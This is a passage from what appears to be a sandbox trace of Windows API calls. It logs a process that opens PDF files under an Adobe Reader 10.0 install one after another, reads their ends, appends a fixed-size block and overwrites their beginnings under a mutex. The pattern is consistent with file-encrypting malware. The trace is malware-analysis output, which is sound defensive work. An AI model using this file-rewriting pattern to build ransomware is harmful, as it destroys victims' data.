lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0060.874] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.876] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x33b5 [0060.877] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.877] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x33b5 [0060.877] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.878] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.878] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec5598*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec5598*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0060.878] CloseHandle (hObject=0x1ac) returned 1 [0060.881] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.881] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.882] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x592a [0060.882] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.882] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.882] ReleaseMutex (hMutex=0x168) returned 1 [0060.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7324c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0060.882] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.887] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x492a [0060.887] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.888] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x492a [0060.888] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.888] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.888] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec5598*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec5598*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0060.888] CloseHandle (hObject=0x1ac) returned 1 [0060.892] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.892] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.892] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x11426 [0060.892] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.893] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.893] ReleaseMutex (hMutex=0x168) returned 1 [0060.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0060.893] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.895] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x10426 [0060.895] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.895] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x10426 [0060.896] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.896] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.896] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.896] CloseHandle (hObject=0x1ac) returned 1 [0060.900] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.901] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.901] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6133 [0060.901] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.901] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.901] ReleaseMutex (hMutex=0x168) returned 1 [0060.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7324c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0060.901] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.903] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5133 [0060.903] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.903] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5133 [0060.904] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.904] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0060.904] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ec5598*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec5598*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0060.904] CloseHandle (hObject=0x1ac) returned 1 [0060.912] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.912] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.912] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x197f2 [0060.912] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0060.913] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.913] ReleaseMutex (hMutex=0x168) returned 1 [0060.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0060.913] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.319] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x187f2 [0061.319] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.008] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x187f2 [0062.008] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.009] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0062.009] WriteFile (in: hFile=0x1ac, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.009] CloseHandle (hObject=0x1ac) returned 1 [0062.013] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0062.013] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.013] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x9a88d [0062.013] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.014] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.014] ReleaseMutex (hMutex=0x168) returned 1 [0062.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0062.014] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0062.017] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.018] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9988d [0062.019] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.021] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9988d [0062.022] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.022] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0062.023] WriteFile (in: hFile=0x1ac, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0062.023] WriteFile (in: hFile=0x1ac, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0062.044] CloseHandle (hObject=0x1ac) returned 1 [0062.057] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0062.058] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.058] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x322cc [0062.058] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.058] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.058] ReleaseMutex (hMutex=0x168) returned 1 [0062.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0062.059] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0062.062] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x312cc [0062.062] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.063] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x312cc [0062.064] WriteFile (in: hFile=0x1ac, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.064] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0062.064] WriteFile (in: hFile=0x1ac, lpBuffer=0x1eab988*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1eab988*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0062.064] CloseHandle (hObject=0x1ac) returned 1 [0062.343] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0062.347] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.360] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x9306 [0062.360] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0062.360] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.360] ReleaseMutex (hMutex=0x168) returned 1 [0062.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0062.361] ReadFile (in: hFile=0x1ac, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.364] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8306 [0062.365] ReadFile (in: hFile=0x1ac, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.365] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8306 [0062.365] WriteFile (in: hFile=0x1ac, lpBuffer=0x1e92648*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: 